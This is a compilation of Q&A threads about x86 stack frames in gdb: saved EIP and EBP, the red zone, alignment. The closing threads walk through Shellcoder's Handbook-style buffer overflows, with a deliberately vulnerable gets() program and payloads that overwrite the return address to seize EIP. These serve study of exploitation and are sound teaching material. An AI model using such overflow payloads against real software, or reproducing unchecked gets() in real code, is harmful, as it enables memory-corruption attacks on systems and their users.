How do I calculate the address of the stored EIP?

As the title says, I am trying to obtain the address of the stored EIP in the frame.
For this simple program:
void func1(int a, int b)
{
int x = 1;
}
int main(void)
{
func1(1,2);
}
My gdb disassembly is:
(gdb) disassemble main
Dump of assembler code for function main:
0x08048430 <main+0>: push %ebp
0x08048431 <main+1>: mov %esp,%ebp
0x08048433 <main+3>: sub $0x8,%esp
0x08048436 <main+6>: add $0xfffffff8,%esp
0x08048439 <main+9>: push $0x2
0x0804843b <main+11>: push $0x1
0x0804843d <main+13>: call 0x8048410 <func1>
0x08048442 <main+18>: add $0x10,%esp
0x08048445 <main+21>: mov %ebp,%esp
0x08048447 <main+23>: pop %ebp
0x08048448 <main+24>: ret
End of assembler dump.
Stack frame printed from GDB:
(gdb) info frame
Stack level 0, frame at 0xffbfdda0:
eip = 0x8048416 in func1 (t.c:3); saved eip 0x8048442
called by frame at 0xffbfddc0
source language c.
Arglist at 0xffbfdd98, args: a=1, b=2
Locals at 0xffbfdd98, Previous frame's sp is 0xffbfdda0
Saved registers:
ebp at 0xffbfdd98, eip at 0xffbfdd9c
info frame doesn't seem to give me the address of the saved eip; as far as I can tell, it only shows the value of the saved eip.
I set a breakpoint on func1, then printed the frame information. The saved EIP has a value of 0x8048442, which corresponds to <main+18> in the disassembly. I am confused: how do I calculate the address where the saved EIP (0x8048442) is stored?
I have examined the address 0x8048412 (0x8048416 - 4), but it doesn't contain the saved EIP.

You need to examine the area just before the arg list. GDB already tells you where that is: eip at 0xffbfdd9c.
This address is 4 bytes before the arg list at 0xffbfdd98. Remember that the stack grows down, so "4 bytes before x" means "x+4".
The "saved eip 0x8048442" line reports the value stored there, i.e. the return address. That value points into the text section, not into the stack.

Related

Contents of stack after function call

I'm reading a book that explains how the ebp and eip registers work when a function is called. The following figure is provided:
Here, array is a local variable of the function. The function arguments are a and b. This is what the actual C code looks like:
#include <stdio.h>
void function(int a, int b)
{
int array[8];
}
int main()
{
function(1,2);
return 0;
}
I compile with gcc -m32 -g function.c and run the program in gdb. The command disas main shows (skipped some lines):
0x08048474 : push $0x2
0x08048476 : push $0x1
0x08048478 : call 0x804843b
0x0804847d : add $0x10,%esp
the first and last few instructions of function() are:
0x0804843b : push %ebp
0x0804843c : mov %esp,%ebp
0x0804843e : sub $0x38,%esp
0x08048441 : mov %gs:0x14,%eax
0x08048447 : mov %eax,-0xc(%ebp)
0x0804844a : xor %eax,%eax
0x0804844c : nop
...
0x0804845e : leave
0x0804845f : ret
and when I inspect the contents of ebp:
(gdb) x/4xw $ebp
0xffffcd48: 0xffffcd68 0x0804847d 0x00000001 0x00000002
I understand that on the stack, ebp should be followed by the return location 0x0804847d and the function arguments 0x00000001 and 0x00000002. However, I don't know what 0xffffcd68 is. Is this the address of ebp?
It is the value ebp had at the beginning of the function.
It's a consequence of push %ebp and the fact that the x86 stack is full descending.
In other words, it's the caller's frame pointer.
Beware that compilers change the way they handle the stack much more often than book authors update their books.
In particular, alignment, frame-pointer omission, RVO, implicit parameters and so on may throw you off.

RSP points not to the top of the stack?

I have a problem understanding how the stack works. First my little code:
void func1 ( int z ) {
int i = 1;
}
int main ( ) {
func1 ( 89 );
return 0;
}
I am using:
Ubuntu 16.04 64-bit,
gcc version 5.4.0,
gdb version 7.11.1.
I was debugging with GDB to see how the compiler pushes function arguments onto the stack.
When I examine the stack at the address RSP points to, I get this:
(gdb) x/10xw $rsp
0x7fffffffdf20: 0xffffdf30 0x00007fff 0x00400525 0x00000000
0x7fffffffdf30: 0x00400530 0x00000000 0xf7a2e830 0x00007fff
0x7fffffffdf40: 0x00000000 0x00000000
When I print the address of the most recently created variable, I get this:
(gdb) p &i
$4 = (int *) 0x7fffffffdf14
When I print the address of the variable that was passed to the function, I get this:
(gdb) p &z
$5 = (int *) 0x7fffffffdf0c
The stack grows towards lower addresses.
So I thought that RSP always points to the top of the stack, meaning that when I run x/10xw $rsp I should be able to see all the variables of the function. But I can't see them there.
The first address printed by this command is much higher than the address of the variable z. Because of that, I guessed that RSP does not point to the top of the stack.
What also puzzles me is that the address of i is higher than the address of z.
Since i was pushed onto the stack later than z, I would expect i to be at a lower address than z.
I hope someone can explain why this is so.
EDIT: I have found the answer!
It was an optimization by the compiler. In func1() the RSP register did not point to the "top" of the stack because it was not necessary; it would only be necessary if func1() called another function. The compiler saw that and didn't decrement RSP. (On x86-64 System V this is the "red zone": a leaf function may use the 128 bytes below RSP without adjusting it.)
Here is my assembler code with no function call in func1():
0x00000000004004d6 <+0>: push rbp
0x00000000004004d7 <+1>: mov rbp,rsp
0x00000000004004de <+8>: mov DWORD PTR [rbp-0x14],edi
0x00000000004004e1 <+11>: mov DWORD PTR [rbp-0x4],0x1
0x00000000004004e8 <+18>: mov eax,0x0
0x00000000004004f3 <+29>: leave
0x00000000004004f4 <+30>: ret
So you can see there is no SUB instruction decrementing RSP.
Now the code from func1() with a function call:
0x00000000004004d6 <+0>: push rbp
0x00000000004004d7 <+1>: mov rbp,rsp
0x00000000004004da <+4>: sub rsp,0x20
0x00000000004004de <+8>: mov DWORD PTR [rbp-0x14],edi
0x00000000004004e1 <+11>: mov DWORD PTR [rbp-0x4],0x1
0x00000000004004e8 <+18>: mov eax,0x0
0x00000000004004ed <+23>: call 0x4004f5 <func2>
0x00000000004004f2 <+28>: nop
0x00000000004004f3 <+29>: leave
0x00000000004004f4 <+30>: ret
Here you can see the SUB instruction decrementing RSP, so RSP now points to the "top".
The convention on x86 is that the stack grows "downwards" towards decreasing addresses.
The "top" of the stack is simply the location where something was most recently pushed; it's not based on the relative values of the addresses. A stack can grow "upwards" or "downwards" in the address space - heck, for some implementations (such as a linked list), the addresses don't even have to be sequential.
This page has a fair explanation with diagrams.

Debugging C program (int declaration)

I'm still learning assembly and C, and now I'm trying to understand how the compiler works. Here is a simple piece of code:
int sub()
{
return 0xBEEF;
}
int main(void)
{
int a=10;
sub();
}
I already know how the CPU works, jumping between frames and subroutines and so on.
What I don't understand is where the program stores its local variables. In this case, is it in main's frame?
Here is main's frame in the debugger:
0x080483f6 <+0>: push %ebp
0x080483f7 <+1>: mov %esp,%ebp
0x080483f9 <+3>: sub $0x10,%esp
=> 0x080483fc <+6>: movl $0xa,-0x4(%ebp)
0x08048403 <+13>: call 0x80483ec <sub>
0x08048408 <+18>: leave
0x08048409 <+19>: ret
I have a breakpoint on "int a=10;", which is why the arrow is at offset 6.
So main starts like the other functions, pushing ebp and so on, and then comes the part I don't understand:
0x080483f9 <+3>: sub $0x10,%esp
=> 0x080483fc <+6>: movl $0xa,-0x4(%ebp)
Why is it doing a sub on esp? Is the variable 'a' on the stack at offset -0x4 from the stack pointer?
Just trying to clear up my ideas here :D
Thanks in advance!
0x080483f9 <+3>: sub $0x10,%esp
You will find such an instruction in most functions that have locals. Its purpose is to create a stack frame of the appropriate size so that the function can store its locals (remember that the stack grows downward!).
The stack frame is larger than strictly needed in this case. This is because gcc (starting from 2.96) pads stack frames to 16-byte boundaries by default, to account for SSEx instructions that require packed 128-bit vectors to be aligned to 16 bytes (reference here).
=> 0x080483fc <+6>: movl $0xa,-0x4(%ebp)
This line initializes a to the correct value (0xa = 10 decimal). Here, locals are addressed at an offset relative to ebp, which marks the beginning of the stack frame (the frame therefore spans the region between ebp and esp).

stack overflow (shellcoders handbook)

I was looking at this example from The Shellcoder's Handbook (second edition), and I have some questions about the stack.
root@bt:~/pentest# gdb -q sc
Reading symbols from /root/pentest/sc...done.
(gdb) set disassembly-flavor intel
(gdb) list
1 void ret_input(void){
2 char array[30];
3
4 gets(array);
5 printf("%s\n", array);
6 }
7 main(){
8 ret_input();
9
10 return 0;
(gdb) disas ret_input
Dump of assembler code for function ret_input:
0x08048414 <+0>: push ebp
0x08048415 <+1>: mov ebp,esp
0x08048417 <+3>: sub esp,0x24
0x0804841a <+6>: lea eax,[ebp-0x1e]
0x0804841d <+9>: mov DWORD PTR [esp],eax
0x08048420 <+12>: call 0x804832c <gets@plt>
0x08048425 <+17>: lea eax,[ebp-0x1e]
0x08048428 <+20>: mov DWORD PTR [esp],eax
0x0804842b <+23>: call 0x804834c <puts@plt>
0x08048430 <+28>: leave
0x08048431 <+29>: ret
End of assembler dump.
(gdb) break *0x08048420
Breakpoint 1 at 0x8048420: file sc.c, line 4.
(gdb) break *0x08048431
Breakpoint 2 at 0x8048431: file sc.c, line 6.
(gdb) run
Starting program: /root/pentest/sc
Breakpoint 1, 0x08048420 in ret_input () at sc.c:4
4 gets(array);
(gdb) x/20x $esp
0xbffff51c: 0xbffff522 0xb7fca324 0xb7fc9ff4 0x08048460
0xbffff52c: 0xbffff548 0xb7ea34a5 0xb7ff1030 0x0804846b
0xbffff53c: 0xb7fc9ff4 0xbffff548 0x0804843a 0xbffff5c8
0xbffff54c: 0xb7e8abd6 0x00000001 0xbffff5f4 0xbffff5fc
0xbffff55c: 0xb7fe1858 0xbffff5b0 0xffffffff 0xb7ffeff4
(gdb) continue
Continuing.
AAAAAAAAAABBBBBBBBBBCCCCCCCCCCDDDDDDDD
AAAAAAAAAABBBBBBBBBBCCCCCCCCCCDDDDDDDD
Breakpoint 2, 0x08048431 in ret_input () at sc.c:6
6 }
(gdb) x/20x 0x0bffff51c
0xbffff51c: 0xbffff522 0x4141a324 0x41414141 0x41414141
0xbffff52c: 0x42424242 0x42424242 0x43434242 0x43434343
0xbffff53c: 0x43434343 0x44444444 0x44444444 0xbffff500
0xbffff54c: 0xb7e8abd6 0x00000001 0xbffff5f4 0xbffff5fc
0xbffff55c: 0xb7fe1858 0xbffff5b0 0xffffffff 0xb7ffeff4
(gdb) ^Z
[1]+ Stopped gdb -q sc
root@bt:~/pentest# printf "AAAAAAAAAABBBBBBBBBBCCCCCCCCCCDDDD\x35\x84\x04\x08" | ./sc
AAAAAAAAAABBBBBBBBBBCCCCCCCCCCDDDD5�
AAAAAAAAAABBBBBBBBBBCCCCCCCCCCDDDD:�
root@bt:~/pentest#
In this example I used the 48 bytes "AAAAAAAAAABBBBBBBBBBCCCCCCCCCCDDDD\x35\x84\x04\x08" to overwrite the return address, and it all works. But when I tried to use the example from the first edition of the book, I ran into a problem:
root@bt:~/pentest# gdb -q sc
Reading symbols from /root/pentest/sc...done.
(gdb) disas ret_input
Dump of assembler code for function ret_input:
0x08048414 <+0>: push %ebp
0x08048415 <+1>: mov %esp,%ebp
0x08048417 <+3>: sub $0x24,%esp
0x0804841a <+6>: lea -0x1e(%ebp),%eax
0x0804841d <+9>: mov %eax,(%esp)
0x08048420 <+12>: call 0x804832c <gets@plt>
0x08048425 <+17>: lea -0x1e(%ebp),%eax
0x08048428 <+20>: mov %eax,(%esp)
0x0804842b <+23>: call 0x804834c <puts@plt>
0x08048430 <+28>: leave
0x08048431 <+29>: ret
End of assembler dump.
(gdb)
Why did the program reserve 0x24 (36 decimal) bytes for the array when I used 48 bytes to overwrite the return address? That is 36 bytes for the array and 8 bytes for esp and ebp (as far as I know), but that still leaves 4 unexplained bytes.
OK, let's try the exploit from the first edition of the book, which fills the whole array with the address of the function call. In the book they had "sub $0x20,%esp", so the code is:
main(){
int i=0;
char stuffing[44];
/* fill the buffer with copies of the target address */
for (i=0;i<=40;i+=4)
*(long *) &stuffing[i] = 0x080484bb;
puts(stuffing);
}
I have "sub $0x24,%esp", so my code will be:
main(){
int i=0;
char stuffing[48];
/* fill the buffer with copies of the target address */
for (i=0;i<=44;i+=4)
*(long *) &stuffing[i] = 0x08048435;
puts(stuffing);
}
The result in The Shellcoder's Handbook:
[root@localhost /]# (./adress_to_char;cat) | ./overflow
input
""""""""""""""""""a<u___.input
input
input
And my result:
root@bt:~/pentest# (./ad_to_ch;cat) | ./sc
5�h���ل$���������h����4��0��˄
inout
Segmentation fault
root@bt:~/pentest#
What's the problem?
I compiled with
-fno-stack-protector -mpreferred-stack-boundary=2
I suggest determining the number of bytes needed to overflow the buffer by experimenting in GDB. I compiled the source you provided in your question and ran it through GDB:
gdb$ r < <(python -c "print('A'*30)")
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
[Inferior 1 (process 29912) exited normally]
(Do note that I use Python to create my input instead of a compiled C program. It really does not matter, use what you prefer.)
So 30 bytes are fine. Let's try some more:
gdb$ r < <(python -c "print('A'*50)")
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
Program received signal SIGSEGV, Segmentation fault.
Cannot access memory at address 0x41414141
0x41414141 in ?? ()
gdb$ i r $eip
eip 0x41414141 0x41414141
Our eip register now contains 0x41414141, which is AAAA in ASCII. Now, we can gradually check where exactly we have to place the value in our buffer that updates eip:
gdb$ r < <(python -c "print('A'*40+'BBBB')")
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABBBB
Program received signal SIGSEGV, Segmentation fault.
Cannot access memory at address 0x8004242
0x08004242 in ?? ()
B is 0x42. Thus, we overwrote half of eip when using 40 A's and four B's. Therefore, we pad with 42 A's and then put the value we want to update eip with:
gdb$ r < <(python -c "print('A'*42+'BBBB')")
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABBBB
Program received signal SIGSEGV, Segmentation fault.
Cannot access memory at address 0x42424242
0x42424242 in ?? ()
We got full control over eip! Let's try it. Set a breakpoint at the end of ret_input (your addresses may vary as I recompiled the binary):
gdb$ dis ret_input
Dump of assembler code for function ret_input:
0x08048404 <+0>: push %ebp
0x08048405 <+1>: mov %esp,%ebp
0x08048407 <+3>: sub $0x38,%esp
0x0804840a <+6>: lea -0x26(%ebp),%eax
0x0804840d <+9>: mov %eax,(%esp)
0x08048410 <+12>: call 0x8048310 <gets@plt>
0x08048415 <+17>: lea -0x26(%ebp),%eax
0x08048418 <+20>: mov %eax,(%esp)
0x0804841b <+23>: call 0x8048320 <puts@plt>
0x08048420 <+28>: leave
0x08048421 <+29>: ret
End of assembler dump.
gdb$ break *0x8048421
Breakpoint 1 at 0x8048421
As an example, let's modify eip so once returning from ret_input we end up at the beginning of the function again:
gdb$ r < <(python -c "print('A'*42+'\x04\x84\x04\x08')")
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA�
--------------------------------------------------------------------------[code]
=> 0x8048421 <ret_input+29>: ret
0x8048422 <main>: push ebp
0x8048423 <main+1>: mov ebp,esp
0x8048425 <main+3>: and esp,0xfffffff0
0x8048428 <main+6>: call 0x8048404 <ret_input>
0x804842d <main+11>: mov eax,0x0
0x8048432 <main+16>: leave
0x8048433 <main+17>: ret
--------------------------------------------------------------------------------
Breakpoint 1, 0x08048421 in ret_input ()
We pad 42 A's and then append the address of ret_input to our buffer. Our breakpoint on the ret triggers.
gdb$ x/w $esp
0xffffd30c: 0x08048404
On top of the stack there's the last DWORD of our buffer - ret_input's address.
gdb$ n
0x08048404 in ret_input ()
gdb$ i r $eip
eip 0x8048404 0x8048404 <ret_input>
Executing the next instruction pops that value off the stack and sets eip accordingly.
On a side note: I recommend the .gdbinit file from this guy.
This line:
for (i=o;i<=44;i+=4);
Remove the ; from the end. I also assume that the o (letter o) instead of 0 (zero) is a typo here.
The problem is that your for loop executes ; (i.e. does nothing) until i becomes larger than 44, and then the next statement runs with i = 48, which is outside the bounds of the array, so you get a segmentation fault. Watch out for this type of error: it is hard to spot, and it is completely valid C code.

EIP value incorrect during buffer overflow

I am working on Ubuntu 12.04 on a 64-bit machine. I was reading a good book on buffer overflows and, while playing with one example, ran into something strange.
I have this really simple C code:
#include <stdio.h>
void getInput (void){
char array[8];
gets (array);
printf("%s\n", array);
}
int main(void) {
getInput();
return 0;
}
It is in the file overflow.c.
I compile it with the 32-bit flag because all the examples in the book assume a 32-bit machine, like this:
gcc -fno-stack-protector -g -m32 -o ./overflow ./overflow.c
In the code the char array is only 8 bytes, but looking at the disassembly I found that the array starts 16 bytes away from the saved EBP on the stack, so I executed this line:
printf "aaaaaaaaaaaaaaaaaaaa\x10\x10\x10\x20" | ./overflow
And got:
aaaaaaaaaaaaaaaaaaaa
Segmentation fault (core dumped)
Then I opened core file:
gdb ./overflow core
#0 0x20101010 in ?? ()
(gdb) info registers
eax 0x19 25
ecx 0xffffffff -1
edx 0xf77118b8 -143583048
ebx 0xf770fff4 -143589388
esp 0xffef6370 0xffef6370
ebp 0x61616161 0x61616161
esi 0x0 0
edi 0x0 0
eip 0x20101010 0x20101010
As you can see, EIP did get the new value I wanted. BUT when I try to put in a useful value such as 0x08048410:
printf "aaaaaaaaaaaaaaaaaaaa\x10\x84\x04\x08" | ./overflow
the program crashes as usual, but then something strange happens when I try to observe the value in the EIP register:
#0 0xf765be1f in ?? () from /lib/i386-linux-gnu/libc.so.6
(gdb) info registers
eax 0x61616151 1633771857
ecx 0xf77828c4 -143120188
edx 0x1 1
ebx 0xf7780ff4 -143126540
esp 0xff92dffc 0xff92dffc
ebp 0x61616161 0x61616161
esi 0x0 0
edi 0x0 0
eip 0xf765be1f 0xf765be1f
Suddenly EIP looks like 0xf765be1f instead of 0x08048410. In fact, I noticed that any hexadecimal value starting with 0 is enough to get this garbled EIP value. Do you know why this might happen? Is it because I'm on a 64-bit machine?
UPDATE
People in the comments asked for more information, so here is the disassembly of the getInput function:
(gdb) disas getInput
Dump of assembler code for function getInput:
0x08048404 <+0>: push %ebp
0x08048405 <+1>: mov %esp,%ebp
0x08048407 <+3>: sub $0x28,%esp
0x0804840a <+6>: lea -0x10(%ebp),%eax
0x0804840d <+9>: mov %eax,(%esp)
0x08048410 <+12>: call 0x8048310 <gets@plt>
0x08048415 <+17>: lea -0x10(%ebp),%eax
0x08048418 <+20>: mov %eax,(%esp)
0x0804841b <+23>: call 0x8048320 <puts@plt>
0x08048420 <+28>: leave
0x08048421 <+29>: ret
Perhaps the code at 0x08048410 was executed and jumped to the area around 0xf765be1f. According to your disassembly, 0x08048410 is the call to gets@plt inside getInput.
What's at 0xf765be1f? I guess it's a function in libc, so you can examine its assembly code and see what it would do.
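Also note what the first run overwrote. The buffer starts at -0x10(%ebp), so the 20 a's fill the 16 bytes up to the saved EBP plus the saved EBP itself, which is why EBP contains 0x61616161 (aaaa). The next four bytes, \x10\x10\x10\x20, landed on the return address, which is why EIP contains 0x20101010 (little-endian order).
The second run most likely overwrote the return address in the same way: ret went to 0x08048410, and the crash came later, from the code that ran there.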
This is probably due to the fact that modern OSes (Linux at least; I don't know about Windows) and modern libc have mechanisms that prevent code on the stack from being executed.
Buffer overflow is invoking undefined behavior, therefore anything can happen. Theorizing what might happen is futile.

Resources